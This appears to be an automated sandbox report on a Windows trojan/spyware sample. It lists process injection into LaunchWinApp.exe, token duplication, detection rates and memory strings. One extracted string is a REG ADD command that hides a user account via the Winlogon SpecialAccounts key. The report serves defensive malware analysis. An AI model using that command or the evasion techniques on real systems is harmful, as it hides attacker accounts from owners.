              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA8D480_2_06AA8D48
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA66A00_2_06AA66A0
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA66900_2_06AA6690
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA66480_2_06AA6648
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA45700_2_06AA4570
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA45400_2_06AA4540
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AAB2300_2_06AAB230
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA52620_2_06AA5262
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA60CA0_2_06AA60CA
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA60DC0_2_06AA60DC
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AABE280_2_06AABE28
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA5E000_2_06AA5E00
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AABE180_2_06AABE18
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA6B1B0_2_06AA6B1B
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA19A10_2_06AA19A1
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA59E80_2_06AA59E8
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA59F80_2_06AA59F8
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA19D80_2_06AA19D8
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00424AE32_2_00424AE3
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0042B39F2_2_0042B39F
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0044E1E32_2_0044E1E3
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041828E2_2_0041828E
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004103272_2_00410327
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041C41C2_2_0041C41C
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040E6DD2_2_0040E6DD
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043670C2_2_0043670C
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045E8892_2_0045E889
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004629152_2_00462915
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00416A442_2_00416A44
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041EA4E2_2_0041EA4E
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043EB1A2_2_0043EB1A
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041CD2C2_2_0041CD2C
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041ADCA2_2_0041ADCA
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0044AEC02_2_0044AEC0
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00448F572_2_00448F57
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045AF132_2_0045AF13
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00410F9C2_2_00410F9C
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045B0332_2_0045B033
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040F1862_2_0040F186
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0040D1A32_2_0040D1A3
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004292602_2_00429260
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004652C62_2_004652C6
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041F3F52_2_0041F3F5
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043543D2_2_0043543D
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041D56F2_2_0041D56F
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004116752_2_00411675
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004437402_2_00443740
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004197192_2_00419719
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004378ED2_2_004378ED
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0045D97C2_2_0045D97C
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041D9012_2_0041D901
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_004219E22_2_004219E2
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0042DB882_2_0042DB88
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00437D4A2_2_00437D4A
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0044DD542_2_0044DD54
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041FDB72_2_0041FDB7
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00429E5B2_2_00429E5B
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0044DF862_2_0044DF86
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043DF8D2_2_0043DF8D
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: String function: 00468510 appears 179 times
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: String function: 0044FBAF appears 80 times
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: String function: 00440CFA appears 202 times
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: String function: 00414066 appears 194 times
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: String function: 004414A0 appears 58 times
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0043FC3C: DeviceIoControl,GetLastError,2_2_0043FC3C
              Source: qpwx2wT5ky.exeBinary or memory string: OriginalFilename vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000002.319124765.00000000043CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000000.296234840.0000000000E23000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHospital_project.exeR vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000003.302712970.0000000004953000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000002.319540650.000000000460E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000002.319282911.00000000044EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000002.317907078.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000002.320644906.0000000004717000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exe, 00000000.00000003.302587573.0000000004832000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePphG DCj.exe2 vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exeBinary or memory string: OriginalFilenameHospital_project.exeR vs qpwx2wT5ky.exe
              Source: qpwx2wT5ky.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: qpwx2wT5ky.exeVirustotal: Detection: 47%
              Source: qpwx2wT5ky.exeMetadefender: Detection: 23%
              Source: qpwx2wT5ky.exeReversingLabs: Detection: 66%
              Source: qpwx2wT5ky.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\qpwx2wT5ky.exe "C:\Users\user\Desktop\qpwx2wT5ky.exe"
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess created: C:\Windows\SysWOW64\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp.exe
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 796
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess created: C:\Windows\SysWOW64\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp.exeJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qpwx2wT5ky.exe.logJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDED.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@4/7@0/4
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0042918B CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,2_2_0042918B
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00439308 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,2_2_00439308
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5980
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeMutant created: \Sessions\1\BaseNamedObjects\userkO$1iC2$uM3b$M1a
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: qpwx2wT5ky.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: qpwx2wT5ky.exeStatic file information: File size 1128960 > 1048576
              Source: qpwx2wT5ky.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: qpwx2wT5ky.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x113200
              Source: qpwx2wT5ky.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: qpwx2wT5ky.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ktmw32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nsi.pdb_ source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winnsi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.473103575.00000000053B3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: userenv.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winhttp.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nsi.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbf source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: webio.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msasn1.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sechost.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000010.00000003.485599339.0000000005720000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.485267458.0000000005751000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernelbase.pdb source: WerFault.exe, 00000010.00000002.502132177.0000000002F52000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: c:\TFS\DevDiv\OC-CT-Main23Rel-Dev14\src\src\Waverton\Cct.Contracts.Public\obj\VS140\Release\Release\Microsoft.VisualStudio.WindowsAzure.Contracts.2.3.pdb source: qpwx2wT5ky.exe
              Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000010.00000003.485368691.0000000005722000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485613034.0000000005725000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: crypt32.pdb source: WerFault.exe, 00000010.00000003.485388333.0000000005728000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000010.00000003.485627949.0000000005728000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_01775F98 push esp; ret 0_2_01775F99
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AABA48 push es; retn 0004h0_2_06AABA0C
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00468510 push eax; ret 2_2_0046852E
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0046852F push eax; ret 2_2_00468565
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00468580 push eax; ret 2_2_00468565
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00440FB1 push ecx; ret 2_2_00440FC4
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_00434E00 LoadLibraryA,GetProcAddress,FreeLibrary,2_2_00434E00
              Source: initial sampleStatic PE information: section name: .text entropy: 7.39943250791

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: qpwx2wT5ky.exe, 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
              Source: qpwx2wT5ky.exe, 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
              Source: qpwx2wT5ky.exe, 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
              Source: qpwx2wT5ky.exe, 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
              Source: qpwx2wT5ky.exe, 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
              Source: c:\users\user\desktop\qpwx2wt5ky.exeFile moved: C:\Users\user\AppData\Local\Temp\8a5117119915447493a5b09e32efc8ff.tmpJump to behavior
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0041F3F5 __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041F3F5
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
